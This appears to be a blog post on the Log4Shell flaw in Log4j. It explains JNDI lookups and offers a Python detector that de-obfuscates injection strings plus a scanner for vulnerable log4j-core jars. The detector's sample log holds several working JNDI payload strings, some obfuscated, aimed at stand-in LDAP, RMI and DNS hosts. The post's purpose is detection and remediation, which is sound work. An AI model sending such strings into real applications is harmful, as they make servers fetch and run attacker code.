On Friday 10 December 2021 a proof-of-concept (PoC) exploit for a Remote Code Execution (RCE) vulnerability in the Java logging library ‘log4j’ was published. The vulnerability is tracked as CVE-2021-44228. It is important to note that this exploit can be used by malware and other malicious software to take control of a system without requiring any user interaction: the attacker only needs to get a crafted string into something the application logs.
What is Log4J?
Apache Log4j is a Java-based logging utility and part of the Apache Logging Services, a project of the Apache Software Foundation. It is one of several Java logging frameworks, and an extremely popular open-source library among Java developers because of how simple it makes application logging in Java.
Okay, but what does this vulnerability do?
Log4j 2 performs “lookups” on the messages it logs: a pattern such as ${jndi:ldap://host/x} inside a logged string is resolved through JNDI, which fetches an object from the named server and can cause Java code from that server to run inside the application. The logged string does not have to come from the developer; anything the application writes to its logs (an HTTP User-Agent header, a username, a chat message, a form field) can carry the pattern. So an external person can take control of a system and all the information on it. Since this is an RCE (Remote Code Execution) vulnerability, malicious code supplied from outside can run wherever a vulnerable Log4j is in use. So yeah, it’s a big thing and should be closed immediately.
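To make the lookup mechanism concrete, here is an added detector (my own example code, not part of the original post and not Log4j’s code) that emulates the subset of Log4j 2’s lookup resolution attackers abuse (nested ${...}, the lower:/upper: lookups and the ${key:-default} syntax), then reports which JNDI URLs a logged line would actually try to reach. The access-log lines are constructed for the example; the IP addresses are documentation ranges.

```python
import re

# Innermost ${...} with no nested braces inside: Log4j's StrSubstitutor resolves
# lookups inside-out, which is exactly what the obfuscated payloads rely on.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Inert marker for lookups we cannot (or must not) resolve, e.g. jndi:, env:, sys:.
_TOKEN = "\x00"


def _substitute(body: str) -> str:
    """Resolve one innermost ${body} the way Log4j 2 would, minus real side effects."""
    # Log4j default-value syntax: ${key:-default}. If the key cannot be resolved
    # the default wins, so "${::-j}" is simply "j".
    key, has_default, default = body.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()           # lookup prefixes are matched case-insensitively
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if has_default:
        # We cannot know what env:/sys: resolve to on the victim, so assume the
        # attacker-controlled branch (the default) is reached.
        return default
    # Anything else stays as an inert token so the final prefix remains visible.
    return f"{_TOKEN}{prefix}:{arg}{_TOKEN}"


def normalize(text: str, max_rounds: int = 32) -> str:
    """Repeatedly resolve innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _substitute(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def jndi_targets(line: str) -> list:
    """Return the JNDI URLs a logged line would try to reach, after de-obfuscation."""
    return re.findall(f"{_TOKEN}jndi:([^{_TOKEN}]*){_TOKEN}", normalize(line))


def scan(lines):
    """(line number, targets) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        targets = jndi_targets(line)
        if targets:
            hits.append((n, targets))
    return hits


# Constructed sample access log: one plain request, four exploit attempts of
# increasing obfuscation, and one benign non-JNDI lookup string.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.4 - - [10/Dec/2021:14:05:40 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:ldap://198.51.100.9/x}"',
    '198.51.100.4 - - [10/Dec/2021:14:05:41 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9:1099/x}"',
    '198.51.100.4 - - [10/Dec/2021:14:05:42 +0000] "GET /login HTTP/1.1" 200 512 "-" "${env:HOME:-${jndi:dns://198.51.100.9/t}}"',
    '192.0.2.8 - - [10/Dec/2021:14:09:03 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for n, targets in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup to {', '.join(targets)}")
```

A plain grep for `${jndi:` misses three of the four attempts above; normalising the string first, as the library itself would, is what makes the lookup visible. The same idea applies to any field you log, not just the User-Agent.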
So, it’s dangerous. How can I fix this?
Different companies, such as VMware, have already published workarounds for their products, and Microsoft came out with a statement about this as well. So basically you need to double check whether your application and/or server run Log4j, or simply contact your vendor and apply its mitigation. The real fix is to update Log4j to version 2.16.0 or later (2.15.0 was the first fix, but it turned out to be incomplete, so 2.16.0 is the version to aim for). If you cannot update yet, you can set the system-level property that disables message lookups; this simply switches the feature off, but it only exists on Log4j 2.10 and later and is a stopgap until you upgrade.
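The “double check whether you are running Log4j” step is the part most people get wrong, because log4j-core is usually buried inside a WAR or EAR rather than sitting in a lib directory. The following is an added example (my own code, not from the original post or from Apache) that walks a directory, opens every jar/war/ear including nested ones, reads the version from log4j-core’s pom.properties, and classifies it using the two known workarounds: the `log4j2.formatMsgNoLookups=true` system property (or `LOG4J_FORMAT_MSG_NO_LOOKUPS=true` environment variable), which only exists from 2.10 onwards, and Apache’s advice of deleting `JndiLookup.class` from the jar. The deployment tree it scans is constructed in a temp directory with stand-in jars; the file names and the status strings are my own.

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")

# Status labels (chosen for this example).
VULNERABLE = "VULNERABLE"
FIXED = "fixed"
INCOMPLETE = "incomplete fix (2.15.0), upgrade to 2.16.0 or later"
MITIGATED_CLASS = "mitigated (JndiLookup.class removed), still upgrade"
MITIGATED_PROP = "mitigated (formatMsgNoLookups), still upgrade"
NOT_AFFECTED = "not affected by CVE-2021-44228"


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def assess(version, has_jndi_class, no_lookups_property=False):
    """Map a Log4j version plus the two known workarounds onto a status."""
    if version is None:
        return "unknown version"
    if version[0] != 2:
        return NOT_AFFECTED            # log4j 1.x is end-of-life but not hit by this CVE
    if version >= (2, 16, 0):
        return FIXED                   # message lookups removed, JNDI off by default
    if version >= (2, 15, 0):
        return INCOMPLETE
    if not has_jndi_class:
        return MITIGATED_CLASS
    if no_lookups_property and version >= (2, 10, 0):
        return MITIGATED_PROP          # the property does not exist before 2.10
    return VULNERABLE


def scan_archive(data, name, no_lookups_property=False, findings=None):
    """Recurse into an archive (and nested jars/wars) and record every log4j-core found."""
    findings = [] if findings is None else findings
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            raw = m.group(1).strip() if m else "?"
            status = assess(parse_version(raw), JNDI_CLASS in names, no_lookups_property)
            findings.append((name, raw, status))
        for inner in sorted(names):
            if inner.endswith(ARCHIVES):
                scan_archive(zf.read(inner), f"{name}!{inner}", no_lookups_property, findings)
    return findings


def scan_path(root, no_lookups_property=False):
    """Scan every archive under root; returns [(archive path, raw version, status)]."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.endswith(ARCHIVES):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    scan_archive(fh.read(), path, no_lookups_property, findings)
    return findings


def _make_jar(version, include_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar (not a real build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return buf.getvalue()


def build_sample_tree(root):
    """Constructed deployment: loose jars, one with the class deleted, one nested in a WAR."""
    lib = os.path.join(root, "lib")
    apps = os.path.join(root, "webapps")
    os.makedirs(lib)
    os.makedirs(apps)
    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_make_jar("2.14.1"))
    with open(os.path.join(lib, "log4j-core-2.14.1-stripped.jar"), "wb") as f:
        f.write(_make_jar("2.14.1", include_jndi=False))
    with open(os.path.join(lib, "log4j-core-2.16.0.jar"), "wb") as f:
        f.write(_make_jar("2.16.0"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", _make_jar("2.15.0"))
    with open(os.path.join(apps, "shop.war"), "wb") as f:
        f.write(war.getvalue())


def demo(no_lookups_property=False):
    """Scan the constructed tree; returns {archive basename: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {os.path.basename(n): s for n, _, s in scan_path(root, no_lookups_property)}


if __name__ == "__main__":
    for jar, status in demo().items():
        print(f"{jar:40} {status}")
```

Run it against a real server with `scan_path("/opt/tomcat")` and pass `no_lookups_property=True` only if you have verified the property is actually set on the running JVM. Note that “mitigated” is deliberately not “fixed”: both workarounds leave the vulnerable code on disk, and only an upgrade to 2.16.0 or later removes it.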
The reason why I’m posting this now is that I’ve been busy fixing this. So imagine my fun days at the office! 😉 Anyway, have fun fixing it!